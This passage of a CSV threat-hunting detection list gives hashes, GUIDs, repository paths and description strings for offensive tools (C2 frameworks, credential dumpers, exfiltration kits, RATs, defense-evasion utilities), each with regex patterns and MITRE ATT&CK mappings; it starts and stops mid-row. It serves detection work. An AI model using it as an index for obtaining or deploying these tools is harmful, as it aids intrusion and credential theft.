Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*9EFFFF7A-DC03-4D52-BB8F-F0140FAD26E7*",".{0,1000}9EFFFF7A\-DC03\-4D52\-BB8F\-F0140FAD26E7.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*9emin1/charlotte*",".{0,1000}9emin1\/charlotte.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*9f1853b2b8ee03b428bfcad0502959b2a00761471599e3db4c86ab9550df9b69*",".{0,1000}9f1853b2b8ee03b428bfcad0502959b2a00761471599e3db4c86ab9550df9b69.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*9f19635e335acf9c73acaa6754d100215f3a14a5dfb656abf9dd416237dd3b21*",".{0,1000}9f19635e335acf9c73acaa6754d100215f3a14a5dfb656abf9dd416237dd3b21.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9f42af7c49f77e716869186e182bee63348dd63dc9f407e08f0ff930a5e5b9db*",".{0,1000}9f42af7c49f77e716869186e182bee63348dd63dc9f407e08f0ff930a5e5b9db.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9f65528998b39f2e7239f89a56ded47ea865eea2d6b82b300cd5de7e62072cf0*",".{0,1000}9f65528998b39f2e7239f89a56ded47ea865eea2d6b82b300cd5de7e62072cf0.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*9f9039910ee089cd67d3771229526bdab9171ab559d73c2f97bd25da459c6155*",".{0,1000}9f9039910ee089cd67d3771229526bdab9171ab559d73c2f97bd25da459c6155.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9f9675403c2be03232b1c3abe344bf0f4188454955ba89592be52ef77add4a39*",".{0,1000}9f9675403c2be03232b1c3abe344bf0f4188454955ba89592be52ef77add4a39.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*9fc3fe230f30e5b9f9bb15065bf62269f494f51f744857d6b8ac90a9937f5bc0*",".{0,1000}9fc3fe230f30e5b9f9bb15065bf62269f494f51f744857d6b8ac90a9937f5bc0.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*9fd5c3497f76b260c02b579d0d5bf95cef10469e08b02d1b1172a046c35ea07d*",".{0,1000}9fd5c3497f76b260c02b579d0d5bf95cef10469e08b02d1b1172a046c35ea07d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9FEA6712-3880-4E5F-BD56-8E58A4EBCCB4*",".{0,1000}9FEA6712\-3880\-4E5F\-BD56\-8E58A4EBCCB4.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*9ff84ad7a284229d49078e3bda95630c060e7845e94169065b47e285795747ad*",".{0,1000}9ff84ad7a284229d49078e3bda95630c060e7845e94169065b47e285795747ad.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*A cross-platform python based advanced sql injections detection & exploitation tool*",".{0,1000}A\scross\-platform\spython\sbased\sadvanced\ssql\sinjections\sdetection\s\&\sexploitation\stool.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*A DNS (over-HTTPS) C2*",".{0,1000}A\sDNS\s\(over\-HTTPS\)\sC2.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*A fast multi protocol credential bruteforcer/sprayer/enumerator*",".{0,1000}A\sfast\smulti\sprotocol\scredential\sbruteforcer\/sprayer\/enumerator.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*A keylogger written in eBPF.*",".{0,1000}A\skeylogger\swritten\sin\seBPF\..{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*A La Vie* A L'Amour*",".{0,1000}A\sLa\sVie.{0,1000}\sA\sL\'Amour.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*A Python package for data exfiltration.*",".{0,1000}A\sPython\spackage\sfor\sdata\sexfiltration\..{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*A ruby http/https proxy to do EVIL things.*",".{0,1000}A\sruby\shttp\/https\sproxy\sto\sdo\sEVIL\sthings\..{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*A Silent (Hidden) Free Crypto Miner Builder*",".{0,1000}A\sSilent\s\(Hidden\)\sFree\sCrypto\sMiner\sBuilder.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*a very fast brute force webshell password tool.*",".{0,1000}a\svery\sfast\sbrute\sforce\swebshell\spassword\stool\..{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*a0101bdeeb3f99c0640c203716381ef9f6bad8e89973eaa608c801ed3f6ccace*",".{0,1000}a0101bdeeb3f99c0640c203716381ef9f6bad8e89973eaa608c801ed3f6ccace.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*a014358676f18ddbcc1e281a2d21d3fa817bed4c08ad221db34638460d2a24f4*",".{0,1000}a014358676f18ddbcc1e281a2d21d3fa817bed4c08ad221db34638460d2a24f4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*A017568E-B62E-46B4-9557-15B278656365*",".{0,1000}A017568E\-B62E\-46B4\-9557\-15B278656365.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*a0520b0aa5b53fc9f4f2257be26377776ed65ad998a2b515e62b28a8065554f3*",".{0,1000}a0520b0aa5b53fc9f4f2257be26377776ed65ad998a2b515e62b28a8065554f3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a0595728f0d3fbcc2cb434ad9af104158c349cc05a360e037ee027529bde97d1*",".{0,1000}a0595728f0d3fbcc2cb434ad9af104158c349cc05a360e037ee027529bde97d1.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","file_hash","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*a06482e7f00958c2c66cf33a59818551f697bd7f3a601fa227e97d75a5a1c142*",".{0,1000}a06482e7f00958c2c66cf33a59818551f697bd7f3a601fa227e97d75a5a1c142.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*a06cd42be641036f7d0adb765468209f27d88ce00b8df151a01022461e878bb2*",".{0,1000}a06cd42be641036f7d0adb765468209f27d88ce00b8df151a01022461e878bb2.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*a07f6b1395eed1e18701aa02692a381226f45f9bc51d8fd1ec0b800d7583f196*",".{0,1000}a07f6b1395eed1e18701aa02692a381226f45f9bc51d8fd1ec0b800d7583f196.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a08b192f7e3409689c1e8c09dab2093623632dd3fae39b56f6eb85ccd72f3f1d*",".{0,1000}a08b192f7e3409689c1e8c09dab2093623632dd3fae39b56f6eb85ccd72f3f1d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*a0ac483af35fd96f00e099dfea72fcd1a07c0d946e806212c73705a7b82b7b32*",".{0,1000}a0ac483af35fd96f00e099dfea72fcd1a07c0d946e806212c73705a7b82b7b32.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a0acc8bea0d7e8ecacd1b7545e073b7575c28ad9be6464e1e756ba63084b9cd0*",".{0,1000}a0acc8bea0d7e8ecacd1b7545e073b7575c28ad9be6464e1e756ba63084b9cd0.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3*",".{0,1000}A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*a0c0fba4ea509e8ff5ec12e60299e0d08f83dcdd5edd5ceb10d18fc3af5d830b*",".{0,1000}a0c0fba4ea509e8ff5ec12e60299e0d08f83dcdd5edd5ceb10d18fc3af5d830b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a0e17777243f0190053238f503971fc85321ffa8dc12b80bc50b93a2c0d3ea23*",".{0,1000}a0e17777243f0190053238f503971fc85321ffa8dc12b80bc50b93a2c0d3ea23.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*a0e67820a910a6441635cb9b663494bc7b0b72c5d81079f14092a3017c5e9739*",".{0,1000}a0e67820a910a6441635cb9b663494bc7b0b72c5d81079f14092a3017c5e9739.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*A0E7B538-F719-47B8-8BE4-A82C933F5753*",".{0,1000}A0E7B538\-F719\-47B8\-8BE4\-A82C933F5753.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*A0F044C5-D910-4720-B082-58824E372281*",".{0,1000}A0F044C5\-D910\-4720\-B082\-58824E372281.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*a0f8f1ce4928854b11afe7fdc17cf5a932cecb00ddc626e5b9377c5de260cad2*",".{0,1000}a0f8f1ce4928854b11afe7fdc17cf5a932cecb00ddc626e5b9377c5de260cad2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a0rtega/metame*",".{0,1000}a0rtega\/metame.{0,1000}","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","1","N/A","N/A","6","563","87","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" "*A11E7DAE-21F2-46A8-991E-D38DEBE1650F*",".{0,1000}A11E7DAE\-21F2\-46A8\-991E\-D38DEBE1650F.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*a126db530bf2f613db366cf3f51d7a6f1894a2e6ccdd062eb1c454305b4b29eb*",".{0,1000}a126db530bf2f613db366cf3f51d7a6f1894a2e6ccdd062eb1c454305b4b29eb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a129c27027fde0ed374443a6ee7282694e44b670e00cf13b8771fcbc01174cd7*",".{0,1000}a129c27027fde0ed374443a6ee7282694e44b670e00cf13b8771fcbc01174cd7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*A138FC2A-7BFF-4B3C-94A0-62A8BC01E8C0*",".{0,1000}A138FC2A\-7BFF\-4B3C\-94A0\-62A8BC01E8C0.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*A13BGD = base64.b64decode(A13BGD)*",".{0,1000}A13BGD\s\=\s\sbase64\.b64decode\(A13BGD\).{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*a15bb4faba020d217016fde6e231074a*",".{0,1000}a15bb4faba020d217016fde6e231074a.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*a16a8ed5999b3b90c7f5a7a80b7a55fe62941d3a1300ea8f0fcdd8550e93a947*",".{0,1000}a16a8ed5999b3b90c7f5a7a80b7a55fe62941d3a1300ea8f0fcdd8550e93a947.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*a172c88c5af8e591bd8aa539973f62f242b368157ea187d9dbfee8616b51d5c1*",".{0,1000}a172c88c5af8e591bd8aa539973f62f242b368157ea187d9dbfee8616b51d5c1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*A17656B2-42D1-42CD-B76D-9B60F637BCB5*",".{0,1000}A17656B2\-42D1\-42CD\-B76D\-9B60F637BCB5.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*a18ad37ac14721d1aab3478bdb2d5534b5035dfb9b3fa5d0945f4d5252936e51*",".{0,1000}a18ad37ac14721d1aab3478bdb2d5534b5035dfb9b3fa5d0945f4d5252936e51.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*A1A949A4-5CE4-4FCF-A3B9-A2290EA46086*",".{0,1000}A1A949A4\-5CE4\-4FCF\-A3B9\-A2290EA46086.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*a1b10058ecfda37d1e138537856103279a326ce5bf8fa3ac1ab8909aed8632f0*",".{0,1000}a1b10058ecfda37d1e138537856103279a326ce5bf8fa3ac1ab8909aed8632f0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a1b25d3133a37cefe944c0082272520694f00d4e233e7644d0e2897d433f1bf5*",".{0,1000}a1b25d3133a37cefe944c0082272520694f00d4e233e7644d0e2897d433f1bf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - 